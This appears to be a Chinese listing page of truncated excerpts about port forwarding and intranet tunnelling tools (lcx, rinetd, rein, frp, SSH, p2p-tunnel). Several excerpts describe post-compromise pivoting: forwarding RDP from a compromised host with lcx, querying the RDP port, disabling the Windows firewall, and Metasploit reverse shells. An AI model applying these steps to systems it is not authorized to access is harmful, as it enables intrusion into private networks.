工具:lcx.exe 原理:当目标主机仅开放了web服务,而该服务又仅能供内网用户使用,外网用户根本无法直接访问.因此想要让外网用户能能够访问局域网中的系统服务,必须进行端口映射等操作才行.其原理就是把肉鸡A上的3389端口转发到具有外网IP地址的B主机上,这样连接B主机的3389端口就相当于连接A主机的3389端口. 操作:在A主机上执行:lcx -slave  [B主机IP]:port1 [A主机IP]:3389 在B主机上执行 lcx -lister port1 3389 实战!…

前置条件 实现目的:开发本地电脑需要连接没有外网地址的RDS,通过ECS进行转发连接到RDS数据库 客户 PC 终端可以 ssh 登录有公网的 ECS 服务器. 有公网的 ECS 服务器可以通过内网访问其他内网 ECS 服务器. 有公网的 ECS 服务器可以通过内网访问 RDS(ECS 的内网 IP 在 RDS 的白名单中) 1.1 如果是 Ubuntu 系统,可以直接使用如下指令安装: apt-get install rinetd –y 1.2 下面介绍源代码安装配置方法(centos,red…

介绍 本程序主要用于进行反向代理IP地址和端口,功能类似于 nginx 的 stream 模式和rinetd 的功能:在(1.0.5)版本开始,rein支持内网穿透,这一功能类似于frp 和ngrok.由于rein使用了golang语言开发,并且提供已经编译好的可下载版本,在部署配置方面比它们要方便些. 功能列表: 反向代理IP和端口(upstream 模式). 提供本地文件的快速网络(http协议)分享(fileshare 模式). 内网穿透(inps / inpc 模式) rein 支持模式…

0x01 简介 lcx是一款端口转发工具,有三个功能: 第一个功能将本地端口转发到远程主机某个端口上 第二个功能将本地端口转发到本地另一个端口上 第三个功能是进行监听并进行转发使用 Lcx使用的前提是在端口转发的时候需要一台公网服务器 Lcx程序多用于被控制计算机处于内网的时候,被控制机可能中了木马程序,虽然能够进行控制,但还是没有使用远程终端登录到本机进行管理方便,因此在很多情况下,都会想方设法在被控制计算机上开启3389端口,然后通过lcx等进行端口转发,进而在本地连接到被控制计算机的远程终…

1.查看3389端口开放情况: REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber 使用计算机器将0xd3d转换成十进制,可得到3389实际开放的端口号. 2.关闭windows 防火墙:(如有360,会被阻止) 查看本机启动的服务: net start 关闭防火墙: netsh firewall set opmode disable ne…

目录 0x01 正向端口转发 0x02 反向端口转发 0x03 msf正向shell 0x04 msf反向shell 注: 边界机器 win08 192.168.222.175 内网机器 win7 192.168.222.137 msf机器 Ubuntu 192.168.222.177 0x01 正向端口转发 在边界机器上执行端口转发命令,让来自指定端口的流量全部转发到内网指定IP指定端口上. 这里关闭了防火墙,在正常情况下请使用netsh来对端口进行开放,详细步骤可以参考以前的文章[使用net…

前言 买了个便宜的 vps , 在上面装 msf 也装不上,于是想着把端口映射到内网来. 正文 拓扑如下: 首先在内网主机 B ssh -fCNR 7281:localhost:5000 root@C_IP 执行完后会把 B:5000 反弹到 C_IP:7281.此时 C 监听 127.0.0.1:7281 然后然后在 公网中转服务器 C ssh -fCNL *:5586:localhost:7281 localhost 将*:5586--->localhost:7281 此时 C监听 0.0.…

前言 frp 是一个高性能的反向代理应用,可以轻松地进行内网穿透,对外网提供服务,支持 TCP.UDP.HTTP.HTTPS 等协议类型,并且 web 服务支持根据域名进行路由转发. Github: https://github.com/fatedier/frp 安装frp Releases: https://github.com/fatedier/frp/releases 可以直接下载编译好的压缩包,在 Releases 页面中找到对应平台的压缩包,解压后就可以直接用,或者自己下载源码编译.…

系列文章 p2p-tunnel 打洞内网穿透系列(一)客户端配置及打洞 p2p-tunnel 打洞内网穿透系列(二)TCP转发访问远程共享文件夹 p2p-tunnel 打洞内网穿透系列(三)TCP转发访问内网web服务 前提 转发前提是已经完成了客户端注册,并且 A B客户端之间已打洞成功 一.B客户端电脑用iis新建一个网站 1,随便新建个目录,在目录里新建一个 index.html   里面随便写点内容 2,iis新建个网站选择刚刚新建的目录的路径 端口随便选一个未使用过的端口即可 我这里直…

系列文章 p2p-tunnel 打洞内网穿透系列(一)客户端配置及打洞 p2p-tunnel 打洞内网穿透系列(二)TCP转发访问远程共享文件夹 p2p-tunnel 打洞内网穿透系列(三)TCP转发访问内网web服务 前提 转发前提是已经完成了客户端注册,并且 A B客户端之间已打洞成功 一.B客户端设置共享文件夹 在B客户端随便新建个文件夹,设置其共享,设置其everyone权限 二.A端设置TCP转发 在A客户端添加一个端口监听(随便一个未使用过的端口就行),并选择"长连接" 在…